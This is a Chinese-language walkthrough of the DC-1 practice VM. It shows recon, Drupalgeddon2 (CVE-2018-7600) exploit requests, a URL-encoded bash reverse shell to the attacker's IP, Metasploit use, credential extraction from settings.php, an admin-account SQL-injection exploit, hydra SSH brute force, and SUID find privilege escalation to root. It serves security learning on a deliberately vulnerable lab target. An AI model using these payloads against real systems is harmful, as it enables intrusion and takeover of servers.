前言

这个靶机是 @DCAU7 出品的系列靶机DC中的第一个,整个系列一共有9个靶机,希望能够有时间,把9个靶机都做一遍。

3

第一个靶机一共有5个flag,最后一个flag在/root目录下。目标就是找到并读取这5个flag。

信息收集

第一步先确定目标主机ip地址,用nmap扫描:

1
2
3
4
5
6
7
8
9
10
11
kali@kali:~$ nmap -sP 192.168.247.1/24
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-17 08:29 EDT
Nmap scan report for 192.168.247.1
Host is up (0.0013s latency).
Nmap scan report for 192.168.247.2
Host is up (0.00054s latency).
Nmap scan report for 192.168.247.210
Host is up (0.0023s latency).
Nmap scan report for 192.168.247.214
Host is up (0.0014s latency).
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.64 seconds

192.168.247.210是攻击机kali的地址,所以目标主机地址为192.168.247.214

扫描端口,确定目标主机开启了哪些服务:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
kali@kali:~$ nmap -p1-65535 -A 192.168.247.214 -oN /tmp/DC-1.txt
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-17 08:29 EDT
Nmap scan report for 192.168.247.214
Host is up (0.00073s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey: 
|   1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
|   2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_  256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp    open  http    Apache httpd 2.2.22 ((Debian))
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Welcome to Drupal Site | Drupal Site
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          33032/tcp   status
|   100024  1          39430/tcp6  status
|   100024  1          48263/udp6  status
|_  100024  1          52110/udp   status
33032/tcp open  status  1 (RPC #100024)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.18 seconds

目标主机上开放了三个服务。前两个都已经很熟悉了,对于第三个rpcbind服务,这是一个文件共享服务,这个服务也存在一些漏洞,后面可以看看能不能从这里攻入。

漏洞挖掘

因为开启了apache服务,所以我们先访问一下该网站,打开网页,发现是一个Drupal站点:

1

因为是一个登录页面,用最简单的密码尝试,比如admin:admin或是admin:123456,但是都不对。

不过从前面nmap的扫描结果还是暴露出了比较关键的一些信息:

2

主要有两个点:1. 当前的Drupal版本是7.*,但是更具体的没有了;2. robots.txt中禁掉了一些搜索引擎会爬取的页面。

访问http://192.168.247.214/robots.txt得到:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites like Yahoo!
# and Google. By telling these "robots" where not to go on your site,
# you save bandwidth and server resources.
#
# This file will be ignored unless it is at the root of your host:
# Used:    http://example.com/robots.txt
# Ignored: http://example.com/site/robots.txt
#
# For more information about the robots.txt standard, see:
# http://www.robotstxt.org/wc/robots.html
#
# For syntax checking, see:
# http://www.sxw.org.uk/computing/robots/check.html

User-agent: *
Crawl-delay: 10
# Directories
Disallow: /includes/
Disallow: /misc/
Disallow: /modules/
Disallow: /profiles/
Disallow: /scripts/
Disallow: /themes/
# Files
Disallow: /CHANGELOG.txt
Disallow: /cron.php
Disallow: /INSTALL.mysql.txt
Disallow: /INSTALL.pgsql.txt
Disallow: /INSTALL.sqlite.txt
Disallow: /install.php
Disallow: /INSTALL.txt
Disallow: /LICENSE.txt
Disallow: /MAINTAINERS.txt
Disallow: /update.php
Disallow: /UPGRADE.txt
Disallow: /xmlrpc.php
# Paths (clean URLs)
Disallow: /admin/
Disallow: /comment/reply/
Disallow: /filter/tips/
Disallow: /node/add/
Disallow: /search/
Disallow: /user/register/
Disallow: /user/password/
Disallow: /user/login/
Disallow: /user/logout/
# Paths (no clean URLs)
Disallow: /?q=admin/
Disallow: /?q=comment/reply/
Disallow: /?q=filter/tips/
Disallow: /?q=node/add/
Disallow: /?q=search/
Disallow: /?q=user/password/
Disallow: /?q=user/register/
Disallow: /?q=user/login/
Disallow: /?q=user/logout/

我访问了几个页面,有一些页面是需要登录才能访问的,比如/?q=node/add/。因为没事其他的思路,而且这个站点是知名站点,是爆出过很多漏洞的,所以一般这个时候有两种选择,第一个是网上搜索exp,找合适的exp进行攻击;另一种就是利用metasploit进行攻击。

法一:网络搜索EXP进行攻击

该站点是基于Drupal站点,我们知道这个cms其实是爆出过一些知名漏洞的。但是因为无法登录,所以不能找那些需要授权的漏洞,目标是未授权漏洞,也就是无需登录即可触发的漏洞。

4

就上面的截图就涉及了三个漏洞:

1
2
3
CVE-2014-3704
CVE-2018-7600
CVE-2019-6339

但是CVE-2014-3704CVE-2019-6339都是需要管理员权限的,显然无法利用。但是,CVE-2018-7600不需要用户登录就可以执行代码,这个漏洞被叫做drupalgeddon2。具体的分析可以参考这篇文章:

https://research.checkpoint.com/2018/uncovering-drupalgeddon-2/

然后是利用方式,可以参考这篇文章,给出了Drupal 8.* 版本和Drupal 7.* 版本的利用方式:

https://www.jianshu.com/p/7c410db788ed

Drupal 7的利用方式和Drupal 8略有不同。漏洞的入口页面在/?q=user/password,这个页面是可以访问的,它的功能是申请新的密码。

先发送第一个post请求,注入的命令是system('whoami')

1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST /?q=user/password&name[%23post_render][]=system&name[%23markup]=whoami&name[%23type]=markup HTTP/1.1
Host: 192.168.247.214
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.247.214/?q=user/password/
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
Connection: close
Cookie: has_js=1
Upgrade-Insecure-Requests: 1

form_id=user_pass&_triggering_element_name=name

5

从response中得到form_build_id的值form-6cDH7LuTJ10vfyrAsEeWUY15NG8nOA2tRmL-m6oCMtI,这个值需要带入第2个post请求中:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
POST /?q=file/ajax/name/%23value/form-6cDH7LuTJ10vfyrAsEeWUY15NG8nOA2tRmL-m6oCMtI HTTP/1.1
Host: 192.168.247.214
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: has_js=1
Upgrade-Insecure-Requests: 1
If-Modified-Since: Wed, 17 Jun 2020 17:27:51 +0000
If-None-Match: "1592414871"
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 62

form_build_id=form-6cDH7LuTJ10vfyrAsEeWUY15NG8nOA2tRmL-m6oCMtI

6

成功执行了命令!

反弹shell

通过反弹shell获得目标主机的进一步控制:

1
echo "bash -i >& /dev/tcp/192.168.247.210/23333 0>&1" | bash

因为存在特殊字符和空格,url编码处理一下:

1
%65%63%68%6f%20%22%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%32%34%37%2e%32%31%30%2f%32%33%33%33%33%20%30%3e%26%31%22%20%7c%20%62%61%73%68

发送post请求1:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST /?q=user/password&name[%23post_render][]=system&name[%23markup]=%65%63%68%6f%20%22%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%32%34%37%2e%32%31%30%2f%32%33%33%33%33%20%30%3e%26%31%22%20%7c%20%62%61%73%68&name[%23type]=markup HTTP/1.1
Host: 192.168.247.214
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.247.214/?q=user/password/
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
Connection: close
Cookie: has_js=1
Upgrade-Insecure-Requests: 1

form_id=user_pass&_triggering_element_name=name

7

成功获得shell:

8

利用Metasploit获取shell

启动Metasploit,在新版kali中需要使用sudo:

1
sudo msfdb init && msfconsole

搜索可用的exp:

1
msf5 > searchsploit drupal

searchsploit只是在exploit-db数据库中搜索我们提供的关键字:

9

因为当前的版本是7,所以php/webapps/44449.rb应该是适用的,但是执行之后发现提示错误,原因是因为这个脚本中用了windows环境下的\r。。。这着实有点无语

10

那直接看看metasploit中有没有什么攻击模块可以用的:

1
msf5 > search drupal

11

必填的参数是RHOSTS

1
2
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOSTS 192.168.247.214
RHOSTS => 192.168.247.214

12

随后进行exploit,在meterpreter会话中输入shell就能进入目标主机的shell:

1
meterpreter > shell

13

在当前目录下发现第一个flag文件:

1
2
3
www-data@DC-1:/var/www$ cat flag1.txt
cat flag1.txt
Every good CMS needs a config file - and so do you.

/var/www/flag1.txt给出的提示是去看网站的config文件,google一下就能知道config文件是sites/default/settings.php

14

1
2
3
4
5
6
7
www-data@DC-1:/var/www$ cd sites/default
cd sites/default
www-data@DC-1:/var/www/sites/default$ ls
ls
default.settings.php
files
settings.php

查看settings.php文件,发现flag2和数据库账号:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
www-data@DC-1:/var/www/sites/default$ cat settings.php
cat settings.php
<?php

/**
 *
 * flag2
 * Brute force and dictionary attacks aren't the
 * only ways to gain access (and you WILL need access).
 * What can you do with these credentials?
 *
 */

$databases = array (
  'default' => 
  array (
    'default' => 
    array (
      'database' => 'drupaldb',
      'username' => 'dbuser',
      'password' => 'R0ck3t',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);

登录网站

发现了数据库的账号信息dbuser : R0ck3t,所以要登录数据库去找登录管理员的账号信息,在登录数据库之前,先利用python的pty模块获取标准shell:

1
python -c 'import pty; pty.spawn("/bin/bash")'

随后登录mysql:

15

查看相关数据库:

1
2
3
4
5
6
7
8
9
mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| drupaldb           |
+--------------------+
2 rows in set (0.00 sec)

进入数据库drupaldb

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
mysql> use drupaldb; 
use drupaldb;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+-----------------------------+
| Tables_in_drupaldb          |
+-----------------------------+
| actions                     |
| authmap                     |
| batch                       |
| block                       |
| block_custom                |
| block_node_type             |
| block_role                  |
| blocked_ips                 |
| cache                       |
| cache_block                 |
| cache_bootstrap             |
| cache_field                 |
| cache_filter                |
| cache_form                  |
| cache_image                 |
| cache_menu                  |
| cache_page                  |
| cache_path                  |
| cache_update                |
| cache_views                 |
| cache_views_data            |
| comment                     |
| ctools_css_cache            |
| ctools_object_cache         |
| date_format_locale          |
| date_format_type            |
| date_formats                |
| field_config                |
| field_config_instance       |
| field_data_body             |
| field_data_comment_body     |
| field_data_field_image      |
| field_data_field_tags       |
| field_revision_body         |
| field_revision_comment_body |
| field_revision_field_image  |
| field_revision_field_tags   |
| file_managed                |
| file_usage                  |
| filter                      |
| filter_format               |
| flood                       |
| history                     |
| image_effects               |
| image_styles                |
| menu_custom                 |
| menu_links                  |
| menu_router                 |
| node                        |
| node_access                 |
| node_comment_statistics     |
| node_revision               |
| node_type                   |
| queue                       |
| rdf_mapping                 |
| registry                    |
| registry_file               |
| role                        |
| role_permission             |
| search_dataset              |
| search_index                |
| search_node_links           |
| search_total                |
| semaphore                   |
| sequences                   |
| sessions                    |
| shortcut_set                |
| shortcut_set_users          |
| system                      |
| taxonomy_index              |
| taxonomy_term_data          |
| taxonomy_term_hierarchy     |
| taxonomy_vocabulary         |
| url_alias                   |
| users                       |
| users_roles                 |
| variable                    |
| views_display               |
| views_view                  |
| watchdog                    |
+-----------------------------+
80 rows in set (0.00 sec)

mysql>

因为要查看管理员账号,对应的数据表是users表,查看该数据表中的信息:

16

users表中确实存在admin账户的密码,但是是密文存储的。这里也有两个方法来处理。

法一:修改Durpal密码

google直接搜索reset drupal admin password,找到一篇文章Resetting the administrator password with sql-query (Drupal 7) 。使用sql query来修改管理员密码,当电子邮件或是drush方法失效的时候,可以用这个方法重置管理员账号。

  1. 在Drupal的根目录下执行下面命令:

    1
    ./scripts/password-hash.sh [your-new-passwd]

    该脚本可以生成一串密码对应的hash值:

    1
    2
    3
    4
    www-data@DC-1:/var/www$ ./scripts/password-hash.sh 123456
    ./scripts/password-hash.sh 123456

    password: 123456                hash: $S$DIZJ63vWYsYTxIhFLaFcemKmGp8I3K37wYYLgavrrRUkkSeATQN.

  2. 登录mysql修改admin密码:

    1
    2
    3
    4
    mysql> UPDATE users SET pass ='$S$DIZJ63vWYsYTxIhFLaFcemKmGp8I3K37wYYLgavrrRUkkSeATQN.' where uid=1;
    <s ='$S$DIZJ63vWYsYTxIhFLaFcemKmGp8I3K37wYYLgavrrRUkkSeATQN.' where uid=1;   
    Query OK, 1 row affected (0.00 sec)
    Rows matched: 1  Changed: 1  Warnings: 0

法二:使用exploitdb中提供的exp

1
msf5 > searchsploit drupal

找到一个可以增加admin权限用户的exp:

17

使用方法是:

1
Usage: 34992.py -t http[s]://TARGET_URL -u USER -p PASS

尝试创建一个具有admin权限的新用户admin_fake

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
kali@kali:~$ python /usr/share/exploitdb/exploits/php/webapps/34992.py -t http://192.168.247.214 -u admin_fake -p 123456
                                                                                                       
  ______                          __     _______  _______ _____                                        
 |   _  \ .----.--.--.-----.---.-|  |   |   _   ||   _   | _   |                                       
 |.  |   \|   _|  |  |  _  |  _  |  |   |___|   _|___|   |.|   |                                       
 |.  |    |__| |_____|   __|___._|__|      /   |___(__   `-|.  |   
 |:  1    /          |__|                 |   |  |:  1   | |:  |   
 |::.. . /                                |   |  |::.. . | |::.|   
 `------'                                 `---'  `-------' `---'   
  _______       __     ___       __            __   __             
 |   _   .-----|  |   |   .-----|__.-----.----|  |_|__.-----.-----.
 |   1___|  _  |  |   |.  |     |  |  -__|  __|   _|  |  _  |     |
 |____   |__   |__|   |.  |__|__|  |_____|____|____|__|_____|__|__|
 |:  1   |  |__|      |:  |    |___|                               
 |::.. . |            |::.|                                        
 `-------'            `---'                                        
                                                                   
                                 Drup4l => 7.0 <= 7.31 Sql-1nj3ct10n
                                              Admin 4cc0unt cr3at0r

                          Discovered by:

                          Stefan  Horst
                         (CVE-2014-3704)

                           Written by:

                         Claudio Viviani

                      http://www.homelab.it

                         info@homelab.it
                     homelabit@protonmail.ch

                 https://www.facebook.com/homelabit
                   https://twitter.com/homelabit
                 https://plus.google.com/+HomelabIt1/
       https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww


[!] VULNERABLE!

[!] Administrator user created!

[*] Login: admin_fake
[*] Pass: 123456
[*] Url: http://192.168.247.214/?q=node&destination=node

创建admin_fake之后也能够成功登录,访问dashboard页面:

18

发现了flag3

19

得到提示:Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.

这个提示到目前为止还不太明显。先找一下其他的flag。

查看/etc/passwd

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
www-data@DC-1:/var/www$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:104::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
messagebus:x:103:107::/var/run/dbus:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:105:109:MySQL Server,,,:/nonexistent:/bin/false
flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash

发现用户flag4,进入该用户的home目录就能直接查看flag4.txt了:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
www-data@DC-1:/var/www$ cd /home/flag4
cd /home/flag4
www-data@DC-1:/home/flag4$ ls -al
ls -al
total 28
drwxr-xr-x 2 flag4 flag4 4096 Feb 19  2019 .
drwxr-xr-x 3 root  root  4096 Feb 19  2019 ..
-rw------- 1 flag4 flag4   28 Feb 19  2019 .bash_history
-rw-r--r-- 1 flag4 flag4  220 Feb 19  2019 .bash_logout
-rw-r--r-- 1 flag4 flag4 3392 Feb 19  2019 .bashrc
-rw-r--r-- 1 flag4 flag4  675 Feb 19  2019 .profile
-rw-r--r-- 1 flag4 flag4  125 Feb 19  2019 flag4.txt
www-data@DC-1:/home/flag4$ cat flag4.txt
cat flag4.txt
Can you use this same method to find or access the flag in root?

Probably. But perhaps it's not that easy.  Or maybe it is?

但我觉得这个是不是和靶机的本意有点出入啊,正常情况下是应该将flag4.txt文件配置成仅有flag4用户可以读取,所以需要登录flag4用户的账号。这个密码可以用hydra来获取:

1
hydra -l [username] -P [wordlist] [ssh://ip]

20

得到密码orange。ssh登录该用户:

21

到目前为止flag1-flag4都找到了,还有最后一个flag存在在/root目录下,但是因为没有权限,所以普通的账号是不能进入/root目录的:

1
2
3
www-data@DC-1:/home/flag4$ cd /root
cd /root
bash: cd: /root: Permission denied

使用suid提权

如果我们不能直接进行提权,其实还可以借用suid来巧妙地绕过。

这里就需要flag3给的提示了,这个提示分为两个部分:

  1. Special PERMS will help FIND the passwd

find命令有一个-perm选项,能够根据文件的权限来搜索文件:

1
2
3
4
5
-perm -mode
        All of the permission bits mode are set for the file.  Symbolic modes are accepted  in
        this  form, and this is usually the way in which you would want to use them.  You must
        specify `u', `g' or `o' if you use a symbolic mode.  See the EXAMPLES section for some
        illustrative examples.

因为是使用suid提权,所以是-perm -u=s

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
www-data@DC-1:/home/flag4$ find / -perm -u=s 2>/dev/null      
find / -perm -u=s 2>/dev/null
/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/at
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find
/usr/sbin/exim4
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/sbin/mount.nfs

搜索发现了文件/usr/bin/find

1
2
3
www-data@DC-1:/usr/bin$ ls -al find
ls -al find
-rwsr-xr-x 1 root root 162424 Jan  6  2012 find

/usr/bin/flag文件的执行位确实是s,也就是说执行该文件时具有root权限。

  1. but you’ll need to -exec that command to work out how to get what’s in the shadow.

find命令支持一个-exec选项,参考man手册:

1
2
3
4
5
6
7
8
9
10
11
-exec command ;
        Execute  command;  true  if 0 status is returned.  All following arguments to find are
        taken to be arguments to the command until an argument consisting of  `;'  is  encoun‐
        tered.   The  string  `{}' is replaced by the current file name being processed every‐
        where it occurs in the arguments to the command, not just in  arguments  where  it  is
        alone,  as in some versions of find.  Both of these constructions might need to be es‐
        caped (with a `\') or quoted to protect them from expansion by the shell.  See the EX‐
        AMPLES  section for examples of the use of the -exec option.  The specified command is
        run once for each matched file.  The command is executed in  the  starting  directory.
        There  are  unavoidable  security  problems  surrounding  use of the -exec action; you
        should use the -execdir option instead.

-exec选项会在find命令指定的目录下为成功匹配到的文件,执行-exec指定的命令。所以可以新建一个test目录,然后在目录下执行/bin/sh或是/bin/bash,因为这两个文件都是任意用户都可以执行的:

1
2
3
4
5
6
www-data@DC-1:/usr/bin$ ls -al /bin/sh
ls -al /bin/sh
lrwxrwxrwx 1 root root 4 Mar  1  2012 /bin/sh -> dash
www-data@DC-1:/usr/bin$ ls -al /bin/bash
ls -al /bin/bash
-rwxr-xr-x 1 root root 941252 Oct 27  2016 /bin/bash
1
2
3
4
5
6
7
8
www-data@DC-1:/usr/bin$ mkdir test
mkdir test
mkdir: cannot create directory `test': File exists
www-data@DC-1:/usr/bin$ find test -exec '/bin/sh' \;
find test -exec '/bin/sh' \;
# whoami
whoami
root

进入/root目录,发现flag文件thefinalflag.txt

1
2
3
4
5
6
7
8
9
10
11
12
cd /root
# ls -al
ls -al
total 32
drwx------  4 root root 4096 Feb 28  2019 .
drwxr-xr-x 23 root root 4096 Feb 19  2019 ..
drwx------  2 root root 4096 Feb 19  2019 .aptitude
-rw-------  1 root root   44 Feb 28  2019 .bash_history
-rw-r--r--  1 root root  949 Feb 19  2019 .bashrc
drwxr-xr-x  3 root root 4096 Feb 19  2019 .drush
-rw-r--r--  1 root root  140 Nov 20  2007 .profile
-rw-r--r--  1 root root  173 Feb 19  2019 thefinalflag.txt

读取最后的flag文件:

1
2
3
4
5
6
7
8
9
# cat thefinalflag.txt
cat thefinalflag.txt
Well done!!!!

Hopefully you've enjoyed this and learned some new skills.

You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7
#

总结

这个靶机学习到的新知识还挺多的,总结起来有:

  1. 利用metasploit搜索合适的exploitdb中的exp,主要通过searchsploit关键字;
  2. 利用metasploit中的meterpreter攻击目标站点;
  3. 利用suid来提权;
  4. find命令可以根据文件权限进行搜索,还可以对某个目录执行某些命令。